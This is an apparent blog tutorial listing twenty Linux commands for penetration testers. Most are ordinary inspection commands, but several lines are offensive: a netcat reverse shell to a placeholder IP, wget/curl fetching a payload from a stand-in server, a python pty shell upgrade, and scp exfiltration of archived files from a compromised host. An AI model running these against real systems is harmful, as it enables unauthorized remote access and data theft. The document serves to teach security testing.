Top 20 Linux Commands Every Pentester Should Know
As a pentester (penetration tester), you’re often operating in Linux environments. Whether you’re navigating a compromised system, analyzing logs, or launching exploits — knowing the right Linux commands can save time and reveal critical information.
Here, in this blog, we're going to learn the most useful Linux commands every pentester should be familiar with. These commands will assist you in learning the system, detecting vulnerabilities, and navigating through the target environment more efficiently.
Prefer watching instead of reading? Here’s a quick video guide
1: uname -a
What it does: Prints out system information.
Why it's useful: Once you gain entry into a system, you have to know what you're handling. This command informs you about the kernel version, machine architecture, and operating system.
uname -aUse case: Checking whether the system contains a vulnerable kernel version.
2: ifconfig or ip a
What it does: Displays network interface configurations.
Why it's useful: It informs you about the network configuration — IP addresses, interfaces, etc.
ip aTip: In contemporary systems, use ip a instead of ifconfig.
3: netstat -tulnp or ss -tulnp
What it does: Displays open ports and listening services.
Why it's helpful: Finding out about services on a machine as a pentester gives you insight into attack vectors that are possible.
ss -tulnpExplanation:
- t - TCP sockets
- u - UDP sockets
- l - List sockets for listening
- n - Don't look up names
- p - Display process by port number
4: ps aux and top
What they do: Show what is running.
Why they're helpful: They allow you to view what's running currently — which might give away dodgy or at-risk services.
ps auxUse case: Searching for suspicious processes such as reverse shells or malware.
top5: whoami and id
What they do: Display current user and permissions.
Why they're useful: It's important to know your privilege level. If you're a regular user, you may need to escalate privileges.
whoami
id6: sudo -l
What it does: Displays commands you can execute with sudo without a password.
Why it's useful: This command is pure gold when attempting privilege escalation.
sudo -lWatch for: Inappropriately configured sudo privileges that enable you to execute hazardous commands such as vi, less, bash, or python as root.
7: find / -perm -4000 2>/dev/null
What it does: Locate SUID binaries (executables with special permissions).
Why it's useful: SUID binaries can be used to obtain root access.
find / -perm -4000 2>/dev/nullPro tip: Compare the list with GTFOBins to identify privilege escalation vectors.
8: ls -la
What it does: Display files with extended permissions.
Why it’s useful: Helps spot misconfigured files and hidden files (those starting with a dot).
ls -laLook for: Files or directories with world-writable permissions or strange ownerships.
9: cat, less, and head
What they do: Display file contents.
Why they’re useful: You’ll often need to look inside config files, password files, logs, or scripts.
cat /etc/passwd
less /var/log/auth.log
head -n 20 somefile.txtUse case: Searching for hardcoded credentials or cron jobs.
10: grep
What it does: Searches text in files.
Why it's helpful: Ideal for looking up keywords such as passwords, tokens, or API keys.
grep -i 'password' *Use with other commands: With find for enhanced searches of directories.
find . -type f -exec grep -i "secret" {} \;11: crontab -l and cat /etc/crontab
What they do: Display scheduled jobs (cron jobs).
Why they're helpful: Insecurely configured or exploited cron jobs may result in privilege escalation.
crontab -l
cat /etc/crontabRed flag: If a minute-by-minute script is writable by your user — that's your way to root.
12: history
What it does: Displays previously typed commands.
Why it's useful: Handy for seeing what the system owner or attacker did prior.
historyHack: Sometimes passwords get saved accidentally in command history!
13: wget and curl
What they do: Get files or talk to web servers.
Why they’re useful: Perfect for fetching exploits, uploading shells, or testing endpoints.
wget http://yourserver.com/payload.sh
curl -O http://yourserver.com/file.txt14: nc (Netcat)
What it does: A versatile networking tool.
Why it’s useful: Can be used for file transfers, reverse shells, port scanning, and more.
# Create a reverse shell
nc -e /bin/bash yourip 4444Other uses: Great for setting up listeners and interacting with backdoors.
nc -lvnp 4444 # Listen for incoming connection15: chmod and chown
What they do: Change file permissions and ownership.
Why they’re useful: If you’re exploiting writable files or planting backdoors, you’ll need these.
chmod +x exploit.sh
chown root:root script.py16: df -h and du -sh *
What they do: Check disk usage.
Why they’re useful: Finding large or suspicious files, or ensuring there’s space for your payloads.
df -h # Filesystem space
du -sh * # Size of each file/folder17: locate and which
What they do: Find file locations.
Why they’re useful: Great for quickly locating binaries or tools.
locate nc
which python18: bash, sh, python, perl
Why they’re useful: If you’re trying to spawn shells or escalate privileges, sometimes these interpreters can be used to break out.
python -c 'import pty; pty.spawn("/bin/bash")'Bonus: Use pseudo-terminal tricks to get a fully interactive shell.
19: tcpdump
What it does: Captures network traffic.
Why it’s useful: Helps sniff passwords, tokens, or other sensitive data from the wire (if you’re allowed to).
tcpdump -i eth020: tar, gzip, and scp
What they do: Compress and move files.
Why they’re useful: Archiving and transferring data from a compromised machine.
tar czf files.tar.gz *.log
scp files.tar.gz you@yourmachine:/pathFinal Thoughts
As a pentester, Linux commands are your go-to arsenal. Mastering them provides you with speed, accuracy, and productivity in an engagement. It's not merely about remembering the commands — it's about knowing when and how to use them to good effect.
- Drill them in a virtual lab.
- Experiment with combining them into scripts.
- Note down your frequent workflows.